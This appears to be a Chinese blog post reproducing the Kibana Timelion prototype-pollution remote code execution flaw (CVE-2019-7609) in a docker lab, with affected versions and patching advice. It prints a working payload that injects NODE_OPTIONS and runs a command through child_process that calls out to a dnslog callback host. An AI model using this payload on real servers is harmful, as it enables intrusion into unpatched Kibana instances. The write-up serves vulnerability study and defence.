kibana 代码执行 (CVE-2019-7609)

最新推荐文章于 2024-08-19 09:55:02 发布
最新推荐文章于 2024-08-19 09:55:02 发布
阅读量966 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: kibana java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40646572/article/details/130670217
版权

漏洞原理

“原型污染”是一种针对JS语言开发的攻击方法。JS语言中,每一个对象都是有其原型(proto)的,而该原型又有其自己的原型对象,直到某个对象的原型为null。而如果JS对其中定义的对象原型的属性读写缺乏控制,容易让攻击者操纵一些敏感特征,从而实现攻击者的目的。
该漏洞就是是一个由于JS语言的“原型污染”,导致靶机环境量被污染,最终获得shell执行的漏洞。

漏洞影响范围

5.6.15<=Kibana<=6.6.1

漏洞复现过程

启动docker环境。
在这里插入图片描述
打开对应的kibana服务页面。
在这里插入图片描述
点击Timelion功能,修改其中的下方图片中红线标记的内容。
在这里插入图片描述

修改内容并点击右三角符号进行应用。然后点击Canvas即可触发payload。
在这里插入图片描述
在这里插入图片描述
成功触发payload在/tmp目录下生成t.txt文件。

在这里插入图片描述

payload:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("ping    6b7s7k.dnslog.cn  -c 3");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

在这里插入图片描述
在这里插入图片描述

注意

在复现过程中,触发后响应较慢,可能是我虚拟机的问题,也可能是kibana环境本身就是这样,具体情况未知。但在dnslog记录中几乎相差了一分钟左右的时间,才看到记录。
(在docker启动前,需要提前看下docker对应漏洞目录中的README文件,需要修改配置。)

修复建议

该漏洞的利用在满足版本的前提下,需要满足两个条件才会触发该漏洞。
首先kibana服务一般开放在外网之中,并且该漏洞的利用还需要弱口令登录才可以。
1、版本及时升级
2、不要让Kibana的Timelion页面暴露于公网,并检查是否存在使用弱口令登录的情况。

参考链接

cve-2019-7609 Kibana远程代码执行漏洞攻击方法和漏洞原理分析:https://blog.csdn.net/whatday/article/details/107879556
CVE-2019-7609:Kibana远程代码执行漏洞复现:https://blog.csdn.net/zy15667076526/article/details/109706962

bigdogeggs
关注
专栏目录
CVE-2019-7609Kibana远程代码执行漏洞复现
黑白的博客
11-15 4266
声明 好好学习,天天向上 漏洞描述 Kibana 是为 Elasticsearch设计的开源分析和可视化平台。你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析和可视化,以图标的形式展现出来。 攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。 影响范围 Kibana < 6.6.1 Kibana < 5.6.15
Kibana远程代码执行漏洞(CVE-2019-7609)复现
玄道的网安博客
09-27 1125
简介 攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。 影响版本 Kibana < 6.6.1 Kibana < 5.6.15 环境搭建 首先去官网下载6.5.3的tar包并解压 wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz ...
CVE-2019-7609 项目使用教程
最新发布
gitblog_00739的博客
08-19 357
CVE-2019-7609 项目使用教程 CVE-2019-7609exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2019-7609 1. 项目的目录结构及介绍 CVE-2019-7609/ ├── README.md ├── ...
csrf攻击原理与解决方法_CVE-2019-7609 Kibana远程代码执行漏洞攻击方法和漏洞原理分析...
weixin_39669133的博客
11-23 151
0×00 前言本漏洞的exp放出来快一星期了,目前网上的分析文章也出了几篇,但是大都集中于通过容器简单复现攻击过程,没有深入的分析产生原因和exp的构造原理。笔者借鉴了大牛Michał Bentkowski,也就是漏洞发现者的博客上的英文ppt(参考链接3),写了这篇文章。本文详细介绍了在本地搭建了模拟攻击环境的过程(非docker搭建),并完整分析了这个漏洞的攻击原理。现在分享给大家。0×01 ...
Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
EnerY3的博客
12-12 877
CVE-2019-7609 是一个存在于 Kibana 5.6.15 到 6.6.1 版本中的远程代码执行漏洞,它允许攻击者通过原型链污染(Prototype Pollution)在目标服务器上执行任意 JavaScript 代码。这个漏洞是由于 Timelion 组件中的安全问题导致的。
kibana使用_Kibana 任意代码执行漏洞
weixin_39547392的博客
12-03 579
这几天,有人公开了 Kibana 任意代码执行漏洞(CVE-2019-7609)的 POC。这个漏洞的主要原理是因为 Kibana 中的 Timelion 中具有原型链污染漏洞,因此可以导致指定变量的原型链污染,通过传递 NODE 环境变量参数,利用 Kibana 的 Canvas 会创建新进程的特性可以达到远程执行命令的效果。在本地尝试搭建环境复现,忙活了半天,一开始尝试的是 6.4.2 版本的...
cve-2019-7609 Kibana远程代码执行漏洞攻击方法和漏洞原理分析
whatday的专栏
08-08 1515
目录 0x00前言 0x01漏洞简介 0x02环境搭建 0x03漏洞利用 0x04漏洞机理 1、POC验证 ​2、漏洞产生原理和攻击思路 3、payload构建 0x05危害分析和处理建议 0x06参考资料 0x00前言 本漏洞的exp放出来快一星期了,目前网上的分析文章也出了几篇,但是大都集中于通过容器简单复现攻击过程,没有深入的分析产生原因和exp的构造原理。笔者借鉴了大牛Michał Bentkowski,也就是漏洞发现者的博客上的英文ppt(参考链接3),写了...
CVE-2019-7609:在Timelion可视化工具中的Kibana版本5.6.15和6.6.0之前的RCE
04-25
CVE-2019-7609 5.6.15和6.6.1之前的Kibana版本在Timelion可视化工具中包含任意代码执行缺陷。 有权访问Timelion应用程序的攻击者可以发送将尝试执行javascript代码的请求。 这可能导致攻击者在主机系统上以Kibana...
Kibana未授权访问漏洞复现、CVE-2019-7609 Kibana远程代码执行漏洞复现
热门推荐
weixin_43061533的博客
12-25 1万+
0x01 漏洞简述 Kibana如果允许外网访问,没有做安全的登录认证,也会被外部随意访问查看所有的数据,造成少数据泄露。在默认配置下,Kibana就可以访问Elasticsearch中的所有数据。 0x02 知识扩展 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是各种不同的图表、表格、地图等,直观的展示数据,从而达到高级的数据分析
Kibana本地文件包含漏洞(CVE-2018-17246)复现
玄道的网安博客
03-09 2460
漏洞概述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。 影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 环境搭建 这里使用docker进行安装 https://github.c...
Kibana未授权访问漏洞记录(CVE-2019-7609Kibana的RCE,原型链污染,端口:5601)
墨痕诉清风的博客
11-12 5263
漏洞描述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。 漏洞复现 环境启动后,访问 http://your-ip:5601 即可看到Kibana页面。 原型链污染发生在“Timeline”页面,我们填入如下Payload: 创建文件 .es(*).props(label.__proto__.env.AAAA='require("chil
探索CVE-2019-7609安全利用Kibana远程代码执行漏洞的正确方式
gitblog_00019的博客
06-10 355
探索CVE-2019-7609安全利用Kibana远程代码执行漏洞的正确方式 CVE-2019-7609exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2019-7609 在网络安全的世界里,发现并修复漏洞是持续进行的战斗。今天...
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
ahhacker86的专栏
01-23 1391
LFI通常出现在PHP应用中,通样是require这次应用在Nodejs程序中,相信未来还会有更多的Nodejs程序存在这种问题,原因是本地包含漏洞出现了很多年,但依旧有很多软件开发人员和架构师没有考虑到这点,这篇文章很好的说明了Kibana中存在的一个关键LFI漏洞,使得攻击者能够在服务器上运行本地代码,可造成直接的危害就是拒绝服务攻击,若在生产环境下业务实在伤不起,需要引起对Nodejs LFI的重视。
CVE-2019-7609 kibana RCE漏洞复现
三天不打上房揭瓦的博客
04-15 1518
目录漏洞描述影响版本漏洞复现环境搭建反弹shell漏洞修复 漏洞描述 Kibana为 Elassticsearch设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在自标服务器上执行任意Javascript代码。 影响版本 5.6.15<=Kibana<=6.6.1 漏洞复现 环境搭建 小编这里图个方便直接使用vulhub靶场搭建环境 cd /root/vulhub/kibana/CVE-2019-7609 systcl -w vm.
Kibana远程代码执行漏洞(CVE-2019-7609)
MD@@nr丫卡uer
11-24 779
Kibana远程代码执行漏洞(CVE-2019-7609) 漏洞简介 2019年2月官方发布公告称Kibana存在远程代码执行漏洞,5.6.15 和 6.6.1之前的 Kibana 版本在 Timelion 可视化工具中存在功能缺陷,导致攻击者可在服务器上利用Kibana执行任意代码Kibana 是 Elasticsearch 的开源数据可视化插件。它为Elasticsearch提供可视化功能,可以用来搜索和查看存储在Elasticsearch索引中的数据,并可以将数据以各种图标、表格和地图的形式进行可视
CVE-2019-7609: Kibana Timelion Prototype Pollution RCE漏洞利用教程
gitblog_00540的博客
08-19 815
CVE-2019-7609: Kibana Timelion Prototype Pollution RCE漏洞利用教程 CVE-2019-7609exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2019-7609 项目介绍 本项...
Kibana控制台语法
卡布奇诺加点冰
09-13 3535
&lt;REST Verb&gt; /&lt;Index&gt;/&lt;Type&gt;/&lt;ID&gt; &lt;REST动词&gt; / &lt;索引&gt; / &lt;类型&gt; / &lt;ID&gt; #检查群集运行状况 GET /_cat/health?v #获得群集中的节点列表 GET /_cat/nodes?v #列出所有索引 GET /_cat/
kibana-7.4.2-windows-x86_64
09-10
kibana-7.4.2-windows-x86_64是特定的Kibana版本,适用于Windows 64位操作系统。 Kibana-7.4.2是在Elastic Stack的新版本中发布的,其主要目标是提供更好的用户体验和功能增强。在Windows 64位操作系统上使用Kibana...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值